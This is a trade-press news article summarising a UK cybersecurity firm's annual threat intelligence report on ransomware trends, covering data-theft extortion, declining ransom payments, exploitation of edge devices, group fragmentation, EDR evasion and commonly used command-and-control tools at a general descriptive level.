Bridewell, a UK-based cybersecurity services company, has released its latest CTI Annual Report which includes intelligence on ransomware trends, highlighting significant shifts in attack strategies, payment dynamics and threat actor behaviours. The analysis reveals that data theft and extortion have overtaken traditional encryption-only ransomware as the most successful approach for attackers. While encryption-based attacks tend to result in larger individual ransom payments, often due to the urgency of restoring critical services, data theft and extortion cases are more likely to result in a payment, with attackers leveraging the fear of regulatory penalties and reputational damage to pressure victims into compliance.
At the same time, ransomware payments overall have continued to decline year-on-year. Bridewell attributes this to stricter regulations, greater law enforcement coordination and increasing sanctions on cybercriminal entities. Organisations considering payment must now conduct rigorous due diligence to avoid inadvertently transacting with sanctioned groups or Ransomware-as-a-Service (RaaS) operations.
The key findings are as follows:
Vulnerability exploitation on the rise
Bridewell has observed that groups such as Clop and Termite have become highly proficient in exploiting Internet-facing systems and Edge devices, including Fortinet, Ivanti and others. Exploiting unpatched vulnerabilities remains a primary attack vector, allowing threat actors to compromise many victims at scale and drive larger financial outcomes.
Fragmentation and lone wolves
The ransomware ecosystem is becoming increasingly fragmented. Bridewell threat intelligence links this to both infighting within groups and persistent law enforcement takedowns, which have led to the splintering of major groups such as Conti and AlphV/BlackCat. This has resulted in a broader and more diverse pool of active ransomware actors, making the threat landscape more volatile and difficult to defend against.
Compounding this issue is the rise of lone-wolf actors, or individual affiliates or cybercriminals operating independently. These actors often rely on leaked RaaS source code or publicly available tools to mount ransomware operations without the need for an established group. This trend is partly driven by a lack of trust in larger operations due to the risk of exit scams, where affiliates are denied their share of ransom proceeds.
Tactical shifts in tooling and techniques
Bridewell continues to observe ransomware actors targeting VMware ESXi environments, aiming to cripple core virtualised infrastructure quickly. Groups like VanHelsing and DragonForce are actively pursuing this tactic in ongoing campaigns.
Meanwhile, adversaries are developing or acquiring capabilities to evade Endpoint Detection and Response (EDR) systems, often through the abuse of vulnerable drivers or native software features. The use of Living-Off-the-Land Binaries (LOLBINs) and Remote Monitoring and Management (RMM) tools has become widespread, enabling attackers to avoid detection and maintain persistent access without deploying traditional malware.
Despite efforts to disrupt its use, Cobalt Strike remains the most widely used offensive security tool by ransomware operators, closely followed by others such as Metasploit, Sliver, Brute Ratel, and more recently Pyramid C2, a Python-based command and control (C2) framework.
Shift to data theft-only operations
Bridewell has also observed the continued evolution of data-theft-only ransomware operations, which bypass encryption altogether. This approach is especially effective in today’s increasingly regulated privacy landscape, where organisations fear substantial fines and long-term brand damage. Attackers are now refining their extortion tactics to exploit this pressure more effectively.
Remote access and patch management still a weak link
Bridewell’s insights, aligned with Q1 2025 data from Coveware, show that remote access solutions (VPNs, RMMs) and unpatched software vulnerabilities remain leading intrusion vectors. Although phishing incidents appear to be decreasing, it is likely that phishing is now being used indirectly, by access brokers selling credentials to ransomware affiliates.
“We’re seeing a clear shift in ransomware tactics. Encryption-only attacks are proving less effective, while data theft and extortion are leading to more successful payment outcomes. At the same time, organisations are increasingly hesitant to pay ransoms due to growing regulatory pressure and the risk of violating sanctions,” said Gavin Knapp, Cyber Threat Intelligence Principal Lead, Bridewell. “Our goal with this report is to provide actionable insights that help organisations strengthen their defences and build greater resilience against cyber attacks. Staying ahead of persistent and evolving threat actors is no easy task, but understanding and mitigating the risks posed by adversarial infrastructure must remain a core component of any robust cybersecurity strategy.”
There’s plenty of other editorial on our sister site, Electronic Specifier! Or you can always join in the conversation by visiting our LinkedIn page.